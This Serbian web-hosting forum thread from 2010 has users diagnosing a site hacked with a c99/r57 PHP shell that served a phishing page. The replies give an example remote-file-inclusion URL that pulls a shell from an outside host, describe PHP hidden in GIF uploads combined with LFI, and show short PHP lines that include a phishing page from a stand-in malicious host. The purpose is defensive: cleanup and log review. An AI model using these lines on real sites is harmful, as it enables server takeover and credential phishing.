|
Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima |
|
Alati teme | Način prikaza |
17. 03. 2010. | #1 |
branislav mandic mando
Wrote a book
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
|
c99, r57 shell pojasnjenje i iskustva?
Pre dve godine sam na jednom starijem sajtu zaradio infekciju sa c99 ili r57 shell scriptom (nisam sad siguran). Nije bilo naivno...ubacio mi je potpuno novi template sa logom i stranicom e-buy gde trazi info o kreditnoj kartici. Prijava je stigla direktno od e buy-a mom hostingu koji je odmah suspendovao sajt. Za sve to vreme na mom domenu se pokazivao moj originalni sadrzaj, ali na neki nacin i u nekim meni nerazumljivim slucajevima je verovatno pozivan i taj lazni ubaceni template, dakle klasicni phishing.
Uglavnom, sredio sam to za par dana, vratio cist backup i posle vise nisam imao problema Do sada nisam nesto istrazivao sve to...ali su me neke ovdasnje teme na DPT podsetile na problem bezbednosti. Da li je neko imao iskustva sa ovim ili mi moze malo blize pojasniti na koji nacin to radi...zasto sam ja video normalno sajt, i u kojim slucajevima je ta skripta prikazivala fake stranicu? Sacuvao sam i taj php fajl koji sam nasao ubacen, ali je kodiran (64 base) pa ne mogu nista da vidim...moze li se to nekako i sa necim dekodirati?
__________________
... Ej, živote, teško ovo jebote, mani me se živote, ti ga nabijem! |
18. 03. 2010. | #2 |
majstor
Wrote a book
|
Naravno da mozes da ga dekodiras, otvoris sa PHPom i uradis decode i snimis to.
c99 koliko ja znam je shell koji omogucava napadacu da radi sta hoce od fajlova na serveru, a taj drugi nisam cuo. |
18. 03. 2010. | #3 |
Web designer
Professional
|
Sve te shell scripte mozes da preuzmes, testiras i includujes sa r57.gen.tr/
Generalno ako ti je sajt lose napisan, postoji sansa da napadac pozove scriptu na sledeci nacin: tvojsajt.com/nesto.php?inc=http://r57.gen.tr/99.txt? (primer, umesto ucitavanja lokalnog fajla/strane/itd. preuzima i izvrsava php file direkt na tvom serveru, gde dobija pristup listanju, citanju, brisanju, izmeni itd, zavisno od permisija, generalno dovoljno mu je da moze da procita recimo config fajl i da ti zagorca zivot) Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci... Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code). Sve zavisi od servera, ja sam imao dosta problema sto se tih scripti tice, jer je klijent drzao stari sajt na Veratu, gde hvala Bogu nemaju nikakav backup, ja sam uradio novi sajt, postavio umesto starog, medjutim nakon sto je "haker" obrisao kompletan sajt trazio sam od administratora da mi posalje logove, pa sam posle par sati ustanovio da nije uploadovana scripta preko mog sajta i da je ista osoba (info: zone-h.org) to vece obrisala preko 90 sajtova, predpostavljam da je na nekom sajtu pronasao propust, uploadovao shell scriptu i isao redom u foldere i brisao sve sto je uspeo (mislim na citanje config fajlova, editovanje) itd. Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\ Ono sto sam se uverio licno, postavi recimo r57 ili c99 na bilo koji hosting, pokreni i moci ces da "hakujes" vecinu sajtova na tom serveru. Adminu iz Verata sam pre godinu-dve postavio r57 i izlistao im sve sajtove koji su bili na tom serveru gde je klijent drzao sajt, pokazao im sta i kako funkcionise cisto da bi mogli da se zastite, nakon toga sam klijentu predlozio da zakupi hosting na drugom mestu, i naravno vise nije imao tih problema, da li su me u Veratu poslusali ne znam.... Poslednja izmena od bluesman : 18. 03. 2010. u 13:09. |
18. 03. 2010. | #4 |
branislav mandic mando
Wrote a book
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
|
Aha...decodirao sam na ovom decoderu...otvorio mi je bas c99 kompletan kontrolni panel ove scripte.
Koga interesuje da vidi sta tu sve ima, a ima svega!!! moze uciniti isto...fajl u prilogu:
__________________
... Ej, živote, teško ovo jebote, mani me se živote, ti ga nabijem! |
18. 03. 2010. | #5 |
novi član
Na probnom radu
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
|
@3banchi, base64_decode() to što je u eval().
@twix, osiguravanje servera je malo više od instaliranja mod_security, koji je sam po sebi đubre. Ne mora shell da bude na http:// Chini mi se da je upravo sa mod_security pre bila fora ftp://.../shell.txt... Toliko o zaustavljanju RFI-a. Ne mora da bude php shell. Odnosno, disejblovanje suidnih funkcija. Može i perl (cgi) i "apache" shell (fora s' htaccess-om) To sa phpBB-om je verovatno bilo uz pomoć LFI. Jedino tako može da se pokrene PHP shell u gif-u. Moj predlog je da, uz ono što si ti naveo, pregleda sve PHP fajlove izmenjene u skorije vreme...uz nadu da ih nije touch. Edit: Ipak bi bilo gzdeflate(base64_decode({stvar iz eval()})) Edit #2 (@msg #6): I give up... Poslednja izmena od AnonymousCoward : 18. 03. 2010. u 01:41. Razlog: Nova poruka 3banchi-a |
18. 03. 2010. | #6 | ||
branislav mandic mando
Wrote a book
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
|
Citat:
Tako da mi je sad ovo sto si naveo o ubacivanju php koda u gif i sl. extenzije i povezivanje toga sa shellom malo jasnije. Citat:
__________________
... Ej, živote, teško ovo jebote, mani me se živote, ti ga nabijem! |
||
18. 03. 2010. | #7 |
novi član
Na probnom radu
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
|
Ummm ja bih još jednom pokušao da se uključim u temu kada sam se već javio...a i volim ovakve teme
Da pokušam da pojasnim to sa shellom u gifu: To sa PHP-om u njoj je slično steganografiji (sakrivanje teksta (valjda se tako kaže na srpskom )) u konkretnom slučaju PHP koda u slici. Dakle, slika i dalje ostaje validna (u smislu da se ne menja njen izgled i funkcionalnost)...zbog čega prolazi standardne provere da li je slika zaista slika koje često koriste pri aploadu. Ali, internet media type aka MIME za gif je slika... Dakle, otvoriće mu se standardna slika a ne PHP shell (tj. neće se exec PHP kod). Osim ako nije nekim čudom na tom serveru gif = application/x-httpd-php Sa LFI radi zato što to izgleda tipa: Kôd:
include('images/'.$_GET['štagod']); //<-idealan slučaj = http://sajt.tld/skripta.php?štagod=aploadovana_slika_sa_php_kodom.gif Tako da ovo što si zadnje napisao meni nema nikakvog smisla. Reći ću ovako sada (just in case): Ja bih pregledao logove da vidim kako je taj PHP završio gde je završio i fajlove koji su skoro izmenjeni jer mi i nije baš uteha menjanje passworda ako neko može opet da vidi to... (Za svaki slučaj: pod onim touch sam mislio na: en.wikipedia.org/wiki/Touch_(Unix) ili php.net/touch ili....) |
18. 03. 2010. | #8 |
Goran Pilipović
Sir Write-a-Lot
|
Molim vas samo pazite kada stavljate linkove do malicioznih sajtova, ubacujete attachmente sa malicioznim kodom ili ubacujete takav kod u tekst poruke, da ne osvane sutra kada otvorim DPT : Warning, this site can harm your computer.
Google to radi ne samo kada je sajt "uhakovan" nego čak i kada postoji na strani link do poznatog malware sajta.
__________________
Goran Pilipović a.k.a. Ugly Fingers Bradley f.k.a. bluesman I don't always know what I'm talking about but I know I'm right! |
18. 03. 2010. | #9 | |
novi član
Na probnom radu
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
|
Citat:
Verovatno je stavio neku banalnu stvar tipa: Kôd:
if(isset($_GET['phishing'])) die(include('http://zlisajt.tld/phishing.html')); //sa time što bi "phishing" (iz GET) zamenio nečim privlačnijim pa bi phishing link izgledao tipa: http://tvojsajt.tld/?redir=http://www.ibej.tld/UserAccount/login.se Ili, ako ta web aplikacija ostavlja cookies pri poseti ili logovanju (mada je to manje pouzdano), može da proverava da li cookies (ili šta god da može da iskoristi u ovu svrhu) postoji i tako razlikuje validne posetioce od onih koje navlači na phishing. (Podrazumevam da tvoji posetioci nisu meta.) Kôd:
if(!isset($_COOKIE['poslednja_poseta'])) die(include('http://zlisajt.tld/phishing.html')); Elem, osim ako passwordi nisu bili problem, možda ono što napisah sa gledanjem skoro menjanih fajlova ipak možeš da iskoristiš uskoro |
|
18. 03. 2010. | #10 |
Web designer
Professional
|
@AnonymousCoward: Sto se linux administracije tice, znam na sta mislis, koristim linux 9 godina, ja na svom serveru i ne koristim mod_security, ali kao prvi "lek" i na osnovu ovih informacija, ne mogu mu davati druge savete.
@bluesman: ako mozes izmeni u mom postu onda linkove u recimo hxxp://r57[.]gen[.]tr/ |
|
|
Slične teme | ||||
Tema | Početna poruka teme | Forum | Odgovori | Poslednja poruka |
httpool - iskustva | Milan G. | Marketing i SEO | 38 | 23. 10. 2010. 21:59 |
citanje shell output-a tokom izvrsavanja komande | ivanhoe | PHP | 3 | 07. 07. 2010. 02:07 |
Iskustva sa Silverstripe CMS | SiniX | Web aplikacije, web servisi i software | 2 | 28. 01. 2010. 00:49 |